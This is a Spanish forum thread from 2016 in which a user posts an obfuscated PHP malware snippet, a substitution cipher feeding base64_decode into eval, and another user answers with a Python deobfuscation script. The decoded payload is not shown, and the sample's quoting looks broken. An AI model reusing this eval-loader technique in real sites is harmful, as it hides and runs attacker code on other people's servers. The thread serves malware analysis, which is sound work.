Título: Código generado por malware
Publicado por: hecktor1 en 5 Julio 2016, 00:28 am
Alguien ha analizado este tipo de codigo, yo trate de decodificar la variable $lzyxbkb no obtuve ningun resultado. De antemano muchas gracias <?php $xinldc = 3029; function prvefyg($zjuwumi, $nntpi){$rpwdldofjl = ''; for($i=0; $i < strlen($zjuwumi); $i++){$rpwdldofjl .= isset($nntpi[$zjuwumi[$i]]) ? $nntpi[$zjuwumi[$i]] : $zjuwumi[$i];} $oshju="base" . "64_decode";return $oshju($rpwdldofjl);} $lzyxbkb = 'pceJ1ksoYwp5vakOSbsOwahrYOSCPRQkLR8fV8ixpceJ1ksoYwp5vahrYjseS0vrS060GIZ8xLCqIAzf3begSaki";
$zaeuth = Array('1'=>'a', '0'=>'n', '3'=>'b', '2'=>'S', '5'=>'o', '4'=>'7', '7'=>'4', '6'=>'M', '9'=>'q', '8'=>'w', 'A'=>'k', 'C'=>'s', 'B'=>'6', 'E'=>'d', 'D'=>'D', 'G'=>'L', 'F'=>'H', 'I'=>'C', 'H'=>'r', 'K'=>'U', 'J'=>'u', 'M'=>'i', 'L'=>'T', 'O'=>'y', 'N'=>'W', 'Q'=>'5', 'P'=>'I', 'S'=>'c', 'R'=>'E', 'U'=>'Y', 'T'=>'h', 'W'=>'e', 'V'=>'O', 'Y'=>'Z', 'X'=>'j', 'Z'=>'A', 'a'=>'2', 'c'=>'G', 'b'=>'m', 'e'=>'l', 'd'=>'R', 'g'=>'f', 'f'=>'p', 'i'=>'0', 'h'=>'x', 'k'=>'V', 'j'=>'1', 'm'=>'3', 'l'=>'P', 'o'=>'z', 'n'=>'8', 'q'=>'N', 'p'=>'Q', 's'=>'9', 'r'=>'v', 'u'=>'g', 't'=>'t', 'w'=>'X', 'v'=>'J', 'y'=>'F', 'x'=>'K', 'z'=>'B'); eval/*n*/(prvefyg($lzyxbkb, $zaeuth));?>
Título: Re: Código generado por malware
Publicado por: MCKSys Argentina en 5 Julio 2016, 01:36 am
Si usas la table de conversión dada por $zaeuth, te queda que $lzyxbkb es un string en base64 que contiene:
No sé mucho de PHP, pero eso es lo que saco en claro. Por las dudas, el script en python que usé para desofuscar el string: def main(): alfa1 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' alfa2 = 'naSb7oM4wqk6sDdHLrCuUTiWyI5EchYOejZA2mGRlpfx01VP38zQNv9tgJXKFB' cad = 'pceJ1ksoYwp5vakOSbsOwahrYOSCPRQkLR8fV8ixpceJ1ksoYwp5vahrYjseS0vrS060GIZ8xLCqIAzf3begSaki' ret = '' for n in cad: ret += alfa2[alfa1.index(n)] print ret if __name__ == '__main__': main()
Como ves, algo muy sencillo. Saludos!
|